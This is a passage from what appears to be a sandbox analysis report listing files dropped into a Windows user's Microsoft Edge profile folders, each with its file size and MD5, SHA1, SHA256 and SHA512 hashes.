7502d9453168c86631fb40ec90567bf80404615d387afc7ec2beb7a075bcc763

SHA512
868f6dcf32ef80459f3ea122b0d2c79191193b5885c86934a97bfec7e64250e10c23e4d00f34c6c2387a04a15f3f266af96e571bbe37077fb374d6d30f35b829

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
565e7be5b53995b87a79e73ef8c1aff7

SHA1
24a031468dc09856066dde3f2535d71307450376

SHA256
dfc65d88cae523febb31680b52b6ce6e56934a0866544178b6c8c3e6faec347b

SHA512
d1ab74099d09c3574ff4699865a0bf756d07f25aa81a0975daeaeb13c8e659a573e26825912be875a4fbb685167a3367ac749deb4e1b868f97f689c5b1bc8500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5090ebba3f531406008bba9ed25403e0

SHA1
de9cef6938e7b6bdd949006b569b1fa53e80a024

SHA256
6f46cb2707374adbc20d51d3de852a4e92f2a2787a9167b74b08a6dbd8c8b71c

SHA512
25bac3a3f91d071a969243a8fa411013bea535a486d9413c736f3d3f2730f568d17b61e655a35377b5ea168eaba94036cc7c8beba59e1bd5ef6f767eb279f7e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d492ab0b17d00123f2ae1a3751636b2

SHA1
3afbf67b2d0314d8646d8b0d3d78cf70beaa9f91

SHA256
bc9fea00ddd77f0a99fc3998385521e2de0c1aa73bbd0fdb50daa35bc04337c6

SHA512
7bd89e4b1ec53d232ac64e50d157976494d167ff8d929a9010e92828d1414bbb25c9285b33211f61f478fc011e67c181b4177411fe56fa3f14780a5dcf9afde7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3d4db60f-a78b-45b1-a736-4e9e4c8f75a0.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
983d03dc6aef889af05802085ba33d59

SHA1
b91ef29ddf38a74f00e65a922266a780acd00d3a

SHA256
fbef5e89bc582b2da430e5360bebb49a9bf3c7896c72222c11879cf50f1af1a0

SHA512
2329cd16010281a56f749d822c9d18783d05b12eb544f854dd16fd869d6f3c1b544f37771e9d92b1295a0780c8df1dd3f2502b6a1a194d301b0b2ed73f2c1c2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
f6133028696f5379f6c49b6d4d05f98a

SHA1
f9d51c9e3596adc4fc6cb641e1b6e6066340b8ea

SHA256
e7e3b38ba04f934e47dc1f213c83d6eefffcf8705f227e23fdd788471e98f6d3

SHA512
76773170ae1e8ebadd1af2b3ed462365b6b1d8cf18a7a447537f4c0a69bcbe5cb2971f227b72ebebbf2bef1b5150c243024d8491c827017e726ac1e09f4c30cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
55875d19f981f95f63daa63d82711122

SHA1
eaa419627dee4a0f0ea53facb426ecde1cc5b1b6

SHA256
ba2ed4ed150112ae0e164ac0927b3790c63d3478c8d16f0844f68c95a37d4c16

SHA512
ba07b9506cc95b8b9855458760253f1b6d8f24c83542484c6b204500bb11b6facc31c78a8d53cd52aa434062db4a647d7db7986acd9a49973e7d3207acb3c25a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
90909cb2edaeda66a7ea501de6918f0d

SHA1
27b46f7e1ecdc347a7f211f6a6baecab565da987

SHA256
6e69b0800f65a564b454330f2ba979afb1259998e81a86d8c0df3e9e949f50c1

SHA512
db30452f338874e62e50316edbeb7f3f39652015e1f0abbaf054b06d4fd130615383178c4dee207dec48751957f0749416cbaae8f46cd5ef2869b7fdda1ab927

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
96077a25f5419814fe3dbd426298ea72

SHA1
57c7cf854030a28a01264e1dca4db02f634c7402

SHA256
3b903ff39f00e7b1a7675e4e7f4628dabc63b64936dc450b0c93a4399489bd3f

SHA512
282845c35dffa144c83517d9caf0fa5ecc5c2f02a728cb9728350fbff4c46e05e20071fb6d78812687b994576a9e33c53b2ceec5059b2843daa230df21a70f9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
686f6927b968a1ff65ec832763e07ffb

SHA1
c08dc563345b250a8c07045352a0c3364b35df8c

SHA256
cc49235ffc845cbb2fca4ab9d61ca3f6c65b02fbd0a4fd4e7779cd0accb8dbcb

SHA512
4e482217e98a995171f2eed270940eb7492cae6cdc27de615e76d6ee40f08d54887dc3fde8b2f758d0e508ee129e2edc56f29e6d0c9fa899d717b3b07ec0977f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
41KB

MD5
e319c7af7370ac080fbc66374603ed3a

SHA1
4f0cd3c48c2e82a167384d967c210bdacc6904f9

SHA256
5ad4c276af3ac5349ee9280f8a8144a30d33217542e065864c8b424a08365132

SHA512
4681a68a428e15d09010e2b2edba61e22808da1b77856f3ff842ebd022a1b801dfbb7cbb2eb8c1b6c39ae397d20892a3b7af054650f2899d0d16fc12d3d1a011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
34KB

MD5
1b6b124e5cf44c932379937077813f01

SHA1
859ec04879f328806378dfd4e2f63096ab9c2447

SHA256
c968c5a9a62f33701dd8eff5e2bbd844ae60157feb710a491e342ae0bc103150

SHA512
99d720277cbd911219b8a4b7ec4bb1473b2ec52fcbb0d0eb5381b4edab2acd4b1b74d60a515ce3aef364949a922721bbd002755db72bea8ec006e66902525b80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
47KB

MD5
9f96d459817e54de2e5c9733a9bbb010

SHA1
afbadc759b65670865c10b31b34ca3c3e000cd31

SHA256
51b37ee622ba3e2210a8175ecd99d26d3a3a9e991368d0efbb705f21ff9ac609

SHA512
aa2514018ef2e39ebde92125f5cc6fb7f778f2ab3c35d4ec3a075578fda41a76dbd7239fe2ea61533fb3262c04739c6500d1497c006f511aa3142bb2696d2307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
67KB

MD5
b275fa8d2d2d768231289d114f48e35f

SHA1
bb96003ff86bd9dedbd2976b1916d87ac6402073

SHA256
1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1

SHA512
d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
25KB

MD5
e29b448723134a2db688bf1a3bf70b37

SHA1
3c8eba27ac947808101fa09bfe83723f2ab8d6b0

SHA256
349cc041df29f65fd7ffe2944a8872f66b62653bbfbd1f38ce8e6b7947f99a69

SHA512
4ce801111cb1144cfd903a94fb9630354bf91a5d46bbbe46e820c98949f57d96ec243b655f2edeb252a4ec6a80167be106d71a4b56b402be264c13cc208f3e2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
d54c631735ead19d1101c28c54078c74

SHA1
22aceb9713c261e18fb7156312e6c223c6216c30

SHA256
15e13403ecee247d61e17979cbb7d7c06d07cf91f0e10065243cc54a100111a4

SHA512
c5557fe5d765aa98693538faaf6f255863554bca064c0ae0042946c01f81f83c6505ebaa829f588b756ea8e93e0094fbccb4861227f176937fddbb815334a09c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
aa55f0504fd6c5137898c81a2688f9be

SHA1
9d8c9ec29976b3f8bb6e67c427d4c9c5c0c398fd

SHA256
2df4e48f4dff50c0d0273db14fdedab619bd71b2dc69abb308f1a3ec16111a0d

SHA512
912ae11662c07f8703f417985cc8c822724e2f77e732542bb7b85ca68b0ba2ea163237e015a0b085c812085ac6d51d8d7a40adfb5f351b67d38313db9e990c59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
85cad7ec89e63a522ee9331b199bd03e

SHA1
993515512531bd73f7d61c5800eae57f62d23a63

SHA256
91727c8e1acd11ada2254ba4b32873e1a301c9b50a908c140444faf50c529aff

SHA512
197eec71a4ab72f7aa1b8c6402cde6003f2be395269bb3c9b295cf50ece1421b68f370e97b6cf75a913c235406a1727991dba620e54b1979482cdf3039c5cab6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
3335267a3c4ac10c06a20c79e5badaa8

SHA1
64b8285a93d3885af84cb0acd21d9637314f0ba5

SHA256
86ebc03d7f74ae8c953cb8451bbdf35497cf1c3074665f5f7bb5873191288cdc

SHA512
6ea37caf0e4fb0bb02a1e6526b7a2ab400fdc1e6d06b3c02c10f7cc00364eda2eacd04e37fb7db8f8028b1fee9a5027fa438a43847b6faf8f5c7980084da94a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
a8d6ffe41b5bcb5cb3e9840a1dd47eaa

SHA1
7735570ec6a1f95988778bf3364c02ee136f12f2

SHA256
4edc32de1d503fef27c1ca338a8e3d99b244fa26cfcb9aaf1914147d7b07bb42

SHA512
6c5fa930030bcf1f288c4f081b7934eabdd51f9831d7904e31e986bff59b7627de1946cd5474e1dee9d6549467feea31775368c373f483495eadc742ce8979d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
322B

MD5
6648ef1a5daa8e516987a59bf9938b0b

SHA1
19f5a42f5ba4da615d85ee1b023e0d4fda4e6874

SHA256
b8a369a8e7e8c21e179e9070a5c293b2981869e14c024f6025baf46d226e72d2

SHA512
8dc07f30f95d891d99017b7c436e739f5e8261cb8680bde30d0652fa5c9a8f61591e0cbf2bbf516a3f11aae21ae1c54410a49b75b078284b56ac15cf26c06892

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
20KB

MD5
da24918ba6e3ca089700c50272d5e520

SHA1
cf325c79cabf25c53a6a76182f3041f687f2673c

SHA256
a4f2fb4d3df9a600b6a28b68e1c1502d3cdbe1aae0036d856c1b4c25c469b46c

SHA512
772f7c433156de31be5b3904333b4979f8dbe896b99ac22ffd03c47e786042a45ab472df6aaa92e4e6234606c2ec1302954befba181b4a9beca9632ce9b5dec9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
116KB

MD5
ae86a6ef7d61dc39c851d80d92708d2c

SHA1
76ef53f82c87900d63458f12fc73eec8f86adfb7

SHA256
f22ef7df9a23a15e00a64387b8a1e5b25e59bd7b2204f950c6b36a49b8f27514

SHA512
f5d3bb838a4b4081c0edb5e18a68e456eedc1a8364b3c4c01013c2cab2cec987920ecc78a51d91af21f0c8affec7945bf37170d37efb73ea8979e6917976a7eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
931B

MD5
291a79554a2f9413ae5c10747a8dd416

SHA1
0cdc982cb2b3087c07b7e553e751a2d7f0e3efe1

SHA256
4d60888242acd8f77a43557bed75b46408e41951af4b465da898a089295b2888

SHA512
6f1973747281813bb03dc82e0cdd0b1a3b04358a0955908d2271ad13a513c3388611b48311f4a2f1786ddea547ec28325dfec8c6274c56a0778ca34b649ddcb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
8354bd0d19069e948b5aa8d32bb26632

SHA1
5c8be1271212ec7270ddf8cc91a2ebbc263405ca

SHA256
5461fcede30d75d3f9f07b82e66532b563fc0e64478ac865f8999dccf4370f77

SHA512
3769da210ad229bd9bace20471d3719df44ba982e0421075d7b7a01de957ce6e623c21ca795ae26fd3023834ad8dce890b0195ed99cae5535f60c41b4caa87d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
18a1b089d63231658ae24002a6bbcd7d

SHA1
a5a76b7faa0a378c24221d127aee408a73658f17

SHA256
2a00127a2c245d28dd892c499ad8487147547d75e327fac134ea75ea9f801072

SHA512
8ae3e32b7bf36cc256502de15b4ccb5ac019b4de076808b2e383d55fc0efd42b786b96be2becfadb1fee450b8895bd078d346b8932065ac72be19925fe4f83b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
b2ebc2c644268057bdf0b85f940708a6

SHA1
0bf3379453867042dd8a75db8b3f5f651ca50182

SHA256
c1a3b3619de5166d57ef26a1bcde4e3741bb23a11f122cc2921b026c120d70dd

SHA512
06a2edc632f73986393ce2c44d9e33e6149aa7e7b75ad70e99627aa88d3f60cbbd620b868ba45e81a4d25299c0bfac0d8ed91346ba1136862d4c6bb1cc294d0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
1d992124b41ee170968698c41ca10cbf

SHA1
f0c7a584fa7171cdb87747bc3409a87a245567ae

SHA256
950611577a45739c84150651a2cc6807739ea6c0788518e2a2fe5990fc5a5fc3

SHA512
05e4fe351262710d60cf719dd5dfac0cbad650d3b1683fc4426fff85e1ef98fd00a4bd0791fd2cdbe8fcc773e6763cafcc09656f5d2c365af47d387e5bcf423f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
8e53f538b17ca11ed3cbfce3075ad5a9

SHA1
0ea8a7111370f0e97db834cb5d1094b64b8b00a5

SHA256
6d1024cb06351f5838d36a0552d95d84e870d363e162d59095d35816e3173ce6

SHA512
335d102095ab61b866aac9d30a97226a366e5c77f95af653a0e6522a1b7c9eee6f2f36b30f6617b4ea9518cf2eb1150775f668ae5a71f0705f5833bb00b2e09e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
2f9019ec8516c85fb1fa70c09e5a355f

SHA1
6845925c048fb8b6c0998e30a1290dfae254638e

SHA256
b37429a0f9db934317ee03b1c07df5acac6395c9920ac4184956e0deb6ec9b19

SHA512
5bcdb9bbc97e87e55672ee159ea98524879a75bc540e1801b4cc104bf5300e85aa9ab1bd816c5fa34a0175a2d54dd80e7a3bae4dc5a1b3234f02a0afdb3c9fba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
2cbebb647841c27f8ba09b17d4a5d7a5

SHA1
ac617909f0893df6a825648bea868340ab3a92d2

SHA256
e9c0b1046450e558ed2698827ccfb2f36bad13dd02b3fa9a6964acfa3ec42c81

SHA512
81aabfec4198704f653f5b5d1c3ec4f60f3e0e520d2c161ab68acdc4251f712166040bc9e655428ea3a5706d4a74a5370b1b3a2f372510735657c6fe5eda51b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
d3e4db4e41f01878f3b59b7b9ac29254

SHA1
a04e835c57f8e78bdd76103813949ac7f9a7fb81

SHA256
789f606726cf1336b4209af85c32f697268c22a157d4ae15dfe8c24fc31c0cd3

SHA512
9ffa3040d63055deb5fe86fabc71345c1e64c5b2b7c15cb494222acc8d69b29d526f462a6b0cda11ca5ee3385aad9f63af3a781c6de8149a8e8c8d0817850c88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
13a92541c008905b87e1f28cc35920b9

SHA1
67a8f11e2d7e7e53b6aa533d791b072023143095

SHA256
a0023024a106a4f9b568d490f02c435388778282e12a45d34ae1d2b7d2be30df

SHA512
beb70a55584b3c47a363181d9097d59492b1a66f79bd35b51817ac34495f1546908df998d80f5cf4c7cf985ab289a51ad529a045ba9445cc9d6732ca5982ff6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
44871544e020f20f5a2d75cf2dbd8953

SHA1
5970520a4c3e34c0141f7f6c7291d79c3a597783

SHA256
5b7dca7a771ab834e305b16ae5b9113c904ae0c8c28757ae0cd5599eee3d3b04

SHA512
c624972d882db176b964fc4ad548281f10a7397c5a0dc5f1560b275e670a3abddb2c75141fc780913b9dc791edec5f3c6cff7796e46b51f209b2d4a30c5b9a5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
f56edf01746e86bf3a809216f32f86d7

SHA1
ead3477a00b49250df35cbed5d8bca672ca8a2dc

SHA256
86d89176ad36dff0efe3f850bb275676251758c5695a51fd6aec57cdb7da45fb

SHA512
b741c591f5fdad771c7225e1a481c78ed17933f98759d9ea84cbb252ef8b8d725a3aca690f5a296e2c406c9222d1b675dea8be603e1a78cce116aa764e25a0fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3257ab60464a9df8195610f1bd0266ea

SHA1
0a89032f49e6fb63231d108879162127cb8c4e0e

SHA256
433d9f025d49dc9daa69ee6616e89f4cbdfd2e5d1472fa708224c809bd6f73ce

SHA512
1c8deac6985a11649e92280cea36abc47fb546e069aa04cf5f3533410bce7e259fdc34e02d122d1febfa6f8a3ea714b2d46b6ed3fe26c09ed237c289565f0bd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
b73d92d12f1cf62a0a1f2a46372b9fb4

SHA1
d4af509b9b27a2fa51c7edb4961285c8a42c1a2a

SHA256
b81e4ef239899da5bd0ed5af3ce4dd3d3045233178485277fa7630143750069f

SHA512
9a6bfa3f7bd6abc36f2d33e71df4ecc509e5128af52ba92d7ba8eb608d9a30d400c39ba09b513058191f2feab120653289533ef6b043b350c7e6cadbb03d3796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1ba49fd43718f0ccce10e24679a52a43

SHA1
e0a67dd006edeac312d6c2e9d015b373454f32e8

SHA256
46782bcb1a1b959030b3c9d79009b5c1fd7432a97394b43b0c03a568e73fdbf4

SHA512
f524ede65f6088db284a0a7ed33af2ee19b51594bff9554d0fec8f4d049d826b05ebff422031468583d5dc9d67f92b371ad63a256c42f4e6cc817a66c1fe7bff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
18e18a0dfafcf24d99d0aff56c12d93e

SHA1
2db7debc933f82131bc055a1453abe0ce3d0b112

SHA256
0e016719297aef50be790e946cc4ffceabd8bf52d2d56ecf20c33828e6582fe6

SHA512
3de627d095834c33638160962b94d9e378c7b9742456f31137910587850a41904fbd3c0977d16d4396f045a692b7de2a9b96dea9be864138528430b560a62b02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
6df1a5b429b6de57910d0d558659403f

SHA1
9d4e186a881b094e81d6ceab2a3acb6a3c7441ea

SHA256
81752a498d0711d9757e0a24566d0de04cc4f0f3946a00d0098b6089e497a29d

SHA512
434a6cc93e5fd3a8cb963613ff69b614e5805eca399eed202107fdfb248f87e483d0b51fa1f64dbdde11fa3cc3e7f5fca9fb2442fe0aeb62094d6b2d3a125a94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
3c8bb5cff6cf83372ae4f89c1160dce8

SHA1
205299a315984eab96705a13dbdee2912e7e267a

SHA256
15dc48e222c2f12d7ba61f83c3c651e5a23ceebec7f742efcb9c14751bfb229f

SHA512
bb070c23594eb897ec4aa9c89df09bbb218e3e8362b8c2fd6fbbae26c958c6eebbe9a81387727983035d7ed7916f38b970ee493fe80f0592198cc26bcb170bb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a196a034c281be908b48044f070caaa8

SHA1
96f7a2fd3e231ef0aff9e51ca2d3badcb7ca5cd6

SHA256
a03785c554d52cdfb4b65f371581e3da6a92eb31a7ed597d1e0f637140c530f4

SHA512
5db218aac98979393ee1df9f1c0c681c65d0e66aa2c51bcb249718439784b181de3c7bb351fe13e054989a301737265901e8172fc33c521a08b3c0076453479a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
310d4b6a22a04372858eaa9790468a28

SHA1
7d744129f76ed4048412c0e6f8f2430753cf6152

SHA256
ceeea62a1474ffcedc71a5672e370ab1c2b425e7b69f643114fd0b236db8c152

SHA512
795e6145f46dacd5e3a39e65ec03bcd553c15070eb4f5ab4dd907d322efd70a5bb27242e5d2c631dade52c4fcf13b07f21597b80eaef0d355d5cfd01091e2bc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
9ec185cc6a8a580af89730e1537f1a37

SHA1
5d25b7973b0f3fe6d984de2a9ad4ae8fb066169c

SHA256
9484ad2aa707f3316f8e07b51bd25a75ff9865529286abf902e5ea912fd4e059

SHA512
cefc074c0c74906bb3402851187409f667ad226682d603e5d0eadf538ef9984996f585f7729707536beeaa9688dd9740c3cfeb4dab291409b517cade426cdf4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
564688243010204c40a6e91a006974d9

SHA1
549331ccafd95cc18a5823d5b7b3249a87ef3cc2

SHA256
c818f8ba318a930792fe5ac2a09b8c71cf8f65723d187f2ae704e77facc58f57

SHA512
03fd18ed84208a0093747716c98e99c365aa1eaa629f8754d52aea7e956a46e3f578cb1174855ef927e80c8d117761ddbcd81b76ce71e642988cdd9f3f8d27aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e72a688ad95dd73dbbd9fe9c3a6d9651

SHA1
6d68f7ba626f946712a9e6ee31b04e455f96dbf0

SHA256
5e2a1a06230199a3910255197110c848554e8a42abeec6e7a91cc0889bd9d27b

SHA512
fa0f221c8893dc5dfe2f1c1756b773e5121755e08ba4252d1ed3c5a0a434cb00d93361ee121d3eb06a00ef1007d13bc2258197138e775af8cd22fe7f50a2bb82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
bcc46f3da48fbc3faeb4eacec4cd7d84

SHA1
952a13eec3a535a5aecdda5aebdf014babc0a3ce

SHA256
1d552179691d6bcf3da9b47fca4471b6ac8e60a9585996a95e6ccb41f5737aae

SHA512
985538c8075d90c490b730ec9523bdcead3c226eca4b96a46a4c2d89d33973a0056dcee7904c24b00e28e77be2840ee5c66f9171521a215a324a1af260eb931d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
4e560891db28e5aed02787cbde52ee90

SHA1
e6110db12074b7a97ee7565c815110556e74bb86

SHA256
fc0471c0fb3fdf7e5ac2f1c94171b4fd5fc9de1c647441cf92cefe8768a765c7

SHA512
167aaad8c34ae727e900a6252554e5985d34660ac5eb359fcbd8b0cdf0586a51a875015dfe9ba97a9e99d4fc83b1be7b3010ef9aba9237d5049f869997c66a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5958c94cca383ea41184746ab3c94443

SHA1
f0c48a6162921abefb078d123b450909a3e2b283

SHA256
3a5ce822fe78460865562c45ab3420631992197680b7d7501f3e2dde36a9efa0

SHA512
f8f31de7416de4087de24e2a1f39c4f99c6ad4311805c9cee08bc594b2284ad79ecb873abe94d87fb33a338b6d49af7030a742c7ecead41067dc4a9bf4689669

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cf9195f2d2413c8eaaaf6b9575c80b83

SHA1
6a6309e719b14d3e443af32be6c220464e49b841

SHA256
1fb7b488d58e21384f4f156ca12c4ecb3fffbb6760757a744a2fa9810f917ab6

SHA512
59456c8df1baf61adf22b880675cb45eeb620f749a9594172b4062135911e618018c700c3e9c6f169807480e9e10dfe9c082672b9669b18442b2043743985a21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2695b1cbb677c733e3825244a8a90e73

SHA1
1ac09c44ec503bc1f69828b3c86c34b35a4babc7

SHA256
eab19d3f0c61fb00b68cdef782618983d59cfd22216e1fa986275cc2e4f39777

SHA512
0ac6ab9a1e215645d551123562ff508678547ac8e179264e6edef4092fda623fa34ed7d942a1395ea95085ba6b7e626fe6b16f63977fe1c5f14dcfec0d61eb1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

Filesize
33B

MD5
2b432fef211c69c745aca86de4f8e4ab

SHA1
4b92da8d4c0188cf2409500adcd2200444a82fcc

SHA256
42b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de

SHA512
948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

Filesize
36KB

MD5
fc0149c0bc220bbd767f565cb8d7e7a1

SHA1
63efdc8f7225e40854cb248f3317e0d741c8cdd4

SHA256
7225d4b66819dacdc6953a98b8d02b89e7d1fe74ac24db48099a7ef7f65ac873

SHA512
786d3d6c04913a4fa50caa5f67e121808a794adac4e1c861808e130c8e4ab428de40929977e97f33d8654d416020986fe86922324ecbdf48b6d8c964b4f63ba2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
317B

MD5
fc3acdf09178982f9aebba212fe99662

SHA1
1d00632f467db8ecc20e24f0ac523fb0c65d2cbc

SHA256
27965f2b03bc4046eaaf35e950cdabb4c2b89aad3111bb5f3cc8c5efa558c6df

SHA512
cd493be4b487248876b3dbea221760dcd48a2e21c6ddf1011451665203a5b1d33f9ac7cc353253da555e5f2496bada277c6913350b80238dec7e04ed4038f614

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
a5336ba464c8088b351d472c4ef594f3

SHA1
26d85a714e3615d6d406b9db5ab18439c2d0b92a

SHA256
439a2e9a641734190091cd97cebcce2ef1476880c8eb51e7f5dfcc7991c5cb86

SHA512
